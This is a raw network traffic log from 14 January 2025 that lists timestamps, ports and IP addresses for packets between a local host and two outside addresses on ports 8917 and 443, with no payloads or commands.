                                                                        Jan 14, 2025 05:16:05.317300081 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:16:05.317456961 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:16:05.317569971 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:16:05.317744970 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:16:05.317774057 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:16:05.317939043 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:16:05.317945957 CET497698917192.168.11.208.217.78.242
                                                                        Jan 14, 2025 05:16:05.317945957 CET497698917192.168.11.208.217.78.242
                                                                        Jan 14, 2025 05:16:05.318015099 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:16:05.318028927 CET497698917192.168.11.208.217.78.242
                                                                        Jan 14, 2025 05:16:05.318156004 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:16:05.318240881 CET497698917192.168.11.208.217.78.242
                                                                        Jan 14, 2025 05:16:05.318259001 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:16:05.318440914 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:16:05.318469048 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:16:05.318624020 CET497698917192.168.11.208.217.78.242
                                                                        Jan 14, 2025 05:16:05.318656921 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:16:05.318753958 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:16:05.318820000 CET497698917192.168.11.208.217.78.242
                                                                        Jan 14, 2025 05:16:05.318847895 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:16:05.318973064 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:16:05.319051027 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:16:05.319062948 CET497698917192.168.11.208.217.78.242
                                                                        Jan 14, 2025 05:16:05.319062948 CET497698917192.168.11.208.217.78.242
                                                                        Jan 14, 2025 05:16:05.319211960 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:16:05.319222927 CET497698917192.168.11.208.217.78.242
                                                                        Jan 14, 2025 05:16:05.319294930 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:16:05.319401026 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:16:05.319519997 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:16:05.319588900 CET497698917192.168.11.208.217.78.242
                                                                        Jan 14, 2025 05:16:05.319660902 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:16:05.319883108 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:16:05.319910049 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:16:05.320010900 CET497698917192.168.11.208.217.78.242
                                                                        Jan 14, 2025 05:16:05.320060968 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:16:05.320096016 CET497698917192.168.11.208.217.78.242
                                                                        Jan 14, 2025 05:16:05.320127964 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:16:05.320307970 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:16:05.320329905 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:16:05.320338964 CET497698917192.168.11.208.217.78.242
                                                                        Jan 14, 2025 05:16:05.320477962 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:16:05.320557117 CET497698917192.168.11.208.217.78.242
                                                                        Jan 14, 2025 05:16:05.320602894 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:16:05.320741892 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:16:05.320775986 CET497698917192.168.11.208.217.78.242
                                                                        Jan 14, 2025 05:16:05.320811033 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:16:05.320934057 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:16:05.321042061 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:16:05.321044922 CET497698917192.168.11.208.217.78.242
                                                                        Jan 14, 2025 05:16:05.321173906 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:16:05.321276903 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:16:05.321329117 CET497698917192.168.11.208.217.78.242
                                                                        Jan 14, 2025 05:16:05.321394920 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:16:05.321459055 CET497698917192.168.11.208.217.78.242
                                                                        Jan 14, 2025 05:16:05.321513891 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:16:05.321624041 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:16:05.321654081 CET497698917192.168.11.208.217.78.242
                                                                        Jan 14, 2025 05:16:05.321801901 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:16:05.321856976 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:16:05.321974039 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:16:05.322027922 CET497698917192.168.11.208.217.78.242
                                                                        Jan 14, 2025 05:16:05.322102070 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:16:05.322119951 CET497698917192.168.11.208.217.78.242
                                                                        Jan 14, 2025 05:16:05.322268009 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:16:05.322334051 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:16:05.322408915 CET497698917192.168.11.208.217.78.242
                                                                        Jan 14, 2025 05:16:05.322446108 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:16:05.322570086 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:16:05.322618961 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:16:05.322626114 CET497698917192.168.11.208.217.78.242
                                                                        Jan 14, 2025 05:16:05.322731018 CET497698917192.168.11.208.217.78.242
                                                                        Jan 14, 2025 05:16:06.057457924 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:06.057527065 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:06.058672905 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:06.060930967 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:06.060992956 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:06.964592934 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:06.964736938 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:06.964736938 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:06.965816021 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:06.965986013 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:07.010188103 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:07.010193110 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:07.010416031 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:07.010570049 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:07.015654087 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:07.058222055 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:07.322335958 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:07.322355986 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:07.322516918 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:07.322545052 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:07.322679043 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:07.322829008 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:07.322835922 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:07.322877884 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:07.322988033 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:07.325126886 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:07.325251102 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:07.325489044 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:07.330934048 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:07.331120968 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:07.334084988 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:07.334229946 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:07.334229946 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:07.334284067 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:07.339739084 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:07.339947939 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:07.342856884 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:07.343030930 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:07.345823050 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:07.346005917 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:07.346187115 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:07.351525068 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:07.351716042 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:07.354659081 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:07.354859114 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:07.360337019 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:07.360477924 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:07.360569000 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:07.363415003 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:07.363574028 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:07.363574028 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:07.363574028 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:07.366286993 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:07.366477013 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:07.371853113 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:07.371995926 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:07.372124910 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:07.377842903 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:07.378218889 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:07.622374058 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:07.622571945 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:07.622629881 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:07.622837067 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:07.623019934 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:07.623019934 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:07.623200893 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:07.624675989 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:07.624821901 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:07.624821901 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:07.625062943 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:07.630642891 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:07.630790949 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:07.631019115 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:07.636713982 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:07.636966944 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:07.642426968 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:07.642607927 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:07.645287991 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:07.645457983 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:07.645486116 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:07.645486116 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:07.648312092 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:07.648466110 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:07.648466110 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:07.651496887 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:07.651804924 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:07.651804924 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:07.657246113 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:07.657610893 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:07.662945986 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:07.663180113 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:07.665719032 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:07.665878057 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:07.665878057 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:07.668694973 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:07.668920994 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:07.674648046 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:07.675757885 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:07.675757885 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:07.677714109 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:07.677927017 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:07.683381081 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:07.683598042 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:07.686305046 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:07.686548948 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:07.921647072 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:07.921777964 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:07.921834946 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:07.925575018 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:07.925714016 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:07.925714970 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:07.925899029 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:07.928786993 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:07.928922892 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:07.928922892 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:07.929163933 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:07.934324980 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:07.934453011 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:07.934453011 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:07.937447071 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:07.937776089 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:07.940596104 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:07.941116095 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:07.946017027 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:07.946257114 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:07.946413040 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:07.951934099 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:07.952528000 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:07.954849958 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:07.955121040 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:07.958012104 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:07.958204031 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:07.958204031 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:07.963721037 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:07.963910103 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:07.964090109 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:07.966506004 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:07.966701984 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:07.966885090 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:07.972456932 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:07.972657919 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:07.972840071 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:07.975387096 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:07.975584030 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:07.975761890 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:07.978487015 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:07.978755951 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:07.984191895 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:07.984385014 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:07.984438896 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:07.987369061 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:07.987550020 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:07.987734079 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:07.992826939 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:07.993094921 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:07.995889902 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:07.996061087 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:07.996241093 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:07.998961926 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:07.999113083 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:07.999171972 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.004493952 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.004713058 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.004770994 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.007631063 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.007848978 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.007848978 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.008088112 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.013413906 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.013608932 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.016545057 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.016889095 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.016889095 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.022247076 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.022412062 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.022593021 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.025130033 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.025269985 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.025269985 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.028223038 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.028363943 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.028455973 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.033879995 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.034149885 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.037628889 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.037837982 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.042714119 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.042963982 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.042963982 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.046134949 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.046396017 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.049350977 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.049503088 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.049593925 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.054434061 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.054573059 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.054742098 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.057641029 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.058003902 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.063316107 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.063503027 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.063684940 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.066701889 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.066922903 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.067102909 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.069423914 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.069586039 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.069633961 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.075011015 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.075179100 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.075179100 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.078263044 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.078494072 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.078571081 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.083703041 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.083863974 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.083863974 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.086823940 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.086962938 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.086963892 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.089900017 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.090090036 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.090364933 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.095479012 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.095675945 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.101360083 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.101618052 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.104301929 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.104661942 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.107398033 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.107600927 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.112936020 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.113696098 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.214030027 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.214215040 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.218220949 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.218363047 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.218453884 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.221302986 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.221429110 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.221668005 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.224205971 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.224366903 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.224551916 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.229881048 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.230072975 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.233087063 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.233274937 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.233454943 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.238722086 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.238886118 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.239070892 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.241782904 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.241931915 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.242022991 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.244752884 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.244874954 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.245115042 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.250334978 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.250504017 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.250504017 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.250684023 CET49770443192.168.11.20118.178.60.103
